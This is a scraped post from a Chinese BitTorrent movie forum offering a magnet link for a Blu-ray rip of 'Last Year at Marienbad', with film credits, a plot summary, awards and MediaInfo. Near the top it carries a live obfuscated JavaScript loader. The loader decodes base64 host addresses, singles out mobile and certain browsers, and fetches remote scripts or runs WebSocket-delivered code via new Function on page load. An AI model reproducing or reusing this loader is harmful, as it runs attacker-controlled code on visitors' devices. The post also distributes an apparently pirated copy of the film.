去年在马里昂巴德[简繁字幕]Last.Year.at.Marienbad.1961.Criterion.Collection.1080p.BluRay.x265.10bit.FLAC.MNHD-迅雷下载 6.31GB

版主小s 2月前 200

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 去年在马里昂巴德 / 去年在马伦巴(台) / 去年在马里安巴 / 去年在马里昂巴 / Last Year at Marienbad
◎片  名 L'année dernière à Marienbad
◎年  代 1961
◎产  地 法国 / 意大利
◎类  别 剧情 / 爱情 / 悬疑
◎语  言 法语
◎上映日期 1961-08-29(威尼斯电影) / 1961-09-29(法国)
◎IMDb链接 https://www.imdb.com/title/tt0054632/
◎豆瓣评分 8.2/10 (16628人评价)
◎豆瓣链接 https://movie.douban.com/subject/1400240/
◎片  长 94 分钟
◎导  演 阿伦·雷乃 Alain Resnais (id:1054387)
◎编  剧 阿兰·罗布-格里耶 Alain Robbe-Grillet (id:1138547)
◎演  员 德菲因·塞里格 Delphine Seyrig (id:1000594)
       乔治·阿尔贝塔齐 Giorgio Albertazzi (id:1025547)
       萨夏·皮托埃夫 Sacha Pito?ff (id:1033176)
       弗朗索瓦丝·斯皮拉 Fran?oise Spira (id:1154833)
       弗朗科西斯·博汀 Fran?oise Bertin (id:1342944)
       亨利·柯比 Henri Colpi (id:1011092)
       可可·香奈儿 Coco Chanel (id:1023045)
       沃尔克·施隆多夫 Volker Schl?ndorff (id:1002843)

◎标  签 法国 / 新浪潮 / 阿伦·雷奈 / 法国电影 / 阿伦·雷乃 / 1961 / 去年在马里昂巴德 / AlainResnais

◎简  介
  本片用一种现实与记忆穿插的方式勾勒了男主人公X(吉奥吉欧·艾伯塔基 Giorgio Albertazzi 饰)与女主人公A(德菲因·塞里格 Delphine Seyrig 饰)公剪不断理还乱的情感纠葛。X的记忆中对于巴洛克宫殿里的亭台楼阁如数家珍,在他的描述性旁白中,人们 得以感受到他内心巨大的波澜。在剧场舞台上,戏子正在表演着离愁别绪的桥段。观众席上X跟贵妇A对视良久。歇息之时,剧场响起舞曲,X向A邀舞,两人在近距离表达了对彼此的感受。A觉得这个X是个关注自己的陌生人,但是X却讲述了去年与她发生的一段鲜为人知的故事。期间,还穿插了X跟A丈夫M(莎查?皮托夫 Sacha Pito?ff 饰)游戏对决的场景……

◎获奖情况 (共2项)
  第35届奥斯卡金像奖 (1963)
  最佳原创剧本(提名)
   └──阿兰·罗布-格里耶 (id:1138547)

  第22届威尼斯电影节 (1961)
  主竞赛单元 金狮奖
   └──阿伦·雷乃 (id:1054387)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 224586671507044023273005782844505623646 (0xA8F5D1CFC51A484064905B2CCE908C5E)
  4. Complete name                            : Last.Year.at.Marienbad.19[email protected]BBQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 6.31 GiB
  8. Duration                                 : 1 h 34 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 9 540 kb/s
  11. Encoded date                             : UTC 2021-07-22 14:45:53
  12. Writing application                      : mkvmerge v45.0.0 ('Heaven in Pennies') 64-bit
  13. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2
  14. Cover                                    : Yes
  15. Attachments                              : cover
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@High
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 34 min
  23. Bit rate                                 : 8 979 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 812 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.240
  33. Stream size                              : 5.94 GiB (94%)
  34. Writing library                          : x265 0.0:[Linux][GCC 7.5.0][64 bit] 10bit
  35. Encoding settings                        : cpuid=533541111039 / frame-threads=5 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x812 / interlace=0 / total-frames=136268 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=6 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=23 / keyint=250 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.0 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=2 / aq-strength=1.00 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.709
  40. Transfer characteristics                 : BT.709
  41. Matrix coefficients                      : BT.709
  42. Audio #1
  43. ID                                       : 2
  44. Format                                   : FLAC
  45. Format/Info                              : Free Lossless Audio Codec
  46. Codec ID                                 : A_FLAC
  47. Duration                                 : 1 h 34 min
  48. Bit rate mode                            : Variable
  49. Bit rate                                 : 257 kb/s
  50. Channel(s)                               : 1 channel
  51. Channel layout                           : C
  52. Sampling rate                            : 48.0 kHz
  53. Frame rate                               : 10.417 FPS (4608 SPF)
  54. Bit depth                                : 24 bits
  55. Compression mode                         : Lossless
  56. Stream size                              : 174 MiB (3%)
  57. Writing library                          : Lavf58.45.100
  58. Language                                 : French
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Audio #2
  62. ID                                       : 3
  63. Format                                   : FLAC
  64. Format/Info                              : Free Lossless Audio Codec
  65. Codec ID                                 : A_FLAC
  66. Duration                                 : 1 h 34 min
  67. Bit rate mode                            : Variable
  68. Bit rate                                 : 272 kb/s
  69. Channel(s)                               : 1 channel
  70. Channel layout                           : C
  71. Sampling rate                            : 48.0 kHz
  72. Frame rate                               : 10.417 FPS (4608 SPF)
  73. Bit depth                                : 24 bits
  74. Compression mode                         : Lossless
  75. Stream size                              : 184 MiB (3%)
  76. Writing library                          : Lavf58.45.100
  77. Language                                 : French
  78. Default                                  : No
  79. Forced                                   : No
  80. Text #1
  81. ID                                       : 4
  82. Format                                   : PGS
  83. Muxing mode                              : zlib
  84. Codec ID                                 : S_HDMV/PGS
  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  86. Duration                                 : 1 h 33 min
  87. Bit rate                                 : 35.9 kb/s
  88. Count of elements                        : 2130
  89. Stream size                              : 23.9 MiB (0%)
  90. Language                                 : English
  91. Default                                  : No
  92. Forced                                   : No
  93. Text #2
  94. ID                                       : 5
  95. Format                                   : PGS
  96. Muxing mode                              : zlib
  97. Codec ID                                 : S_HDMV/PGS
  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  99. Duration                                 : 1 h 33 min
  100. Bit rate                                 : 18.4 kb/s
  101. Count of elements                        : 1972
  102. Stream size                              : 12.3 MiB (0%)
  103. Title                                    : Simplified Chinese
  104. Language                                 : Chinese
  105. Default                                  : Yes
  106. Forced                                   : No
  107. Text #3
  108. ID                                       : 6
  109. Format                                   : PGS
  110. Muxing mode                              : zlib
  111. Codec ID                                 : S_HDMV/PGS
  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  113. Duration                                 : 1 h 33 min
  114. Bit rate                                 : 18.8 kb/s
  115. Count of elements                        : 1972
  116. Stream size                              : 12.6 MiB (0%)
  117. Title                                    : Traditional Chinese
  118. Language                                 : Chinese
  119. Default                                  : No
  120. Forced                                   : No
  121. Menu
  122. 00:00:00.000                             : en:"Along these corridors"
  123. 00:08:38.184                             : en:After the play
  124. 00:12:18.154                             : en:Conversations
  125. 00:14:47.761                             : en:"I can lose, but I always win"
  126. 00:17:37.723                             : en:"You hardly seem to remember"
  127. 00:20:14.922                             : en:"You must be mistaken"
  128. 00:25:54.094                             : en:In the gardens at Frederiksbad
  129. 00:29:19.090                             : en:"In your dreams?"
  130. 00:32:34.452                             : en:A broken shoe
  131. 00:37:10.269                             : en:A broken glass
  132. 00:42:30.047                             : en:"Leave me alone"
  133. 00:46:52.017                             : en:"Now you are here"
  134. 00:51:21.411                             : en:"You are afraid"
  135. 00:56:18.124                             : en:The bedroom
  136. 01:00:46.809                             : en:"It's impossible"
  137. 01:05:12.783                             : en:Uncertainty
  138. 01:09:45.806                             : en:A photo
  139. 01:13:46.505                             : en:Alive
  140. 01:17:47.829                             : en:"That room"
  141. 01:21:53.950                             : en:"A year isn't long"
  142. 01:27:25.114                             : en:"Alone with me"
  143. 01:34:43.260                             : en:Color bars


TAGS 剧情 悬疑 爱情

磁力链:
  • magnet:?xt=urn:btih:3599AC8C3AA384E22408E5F8AC1F1524B9AA818F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回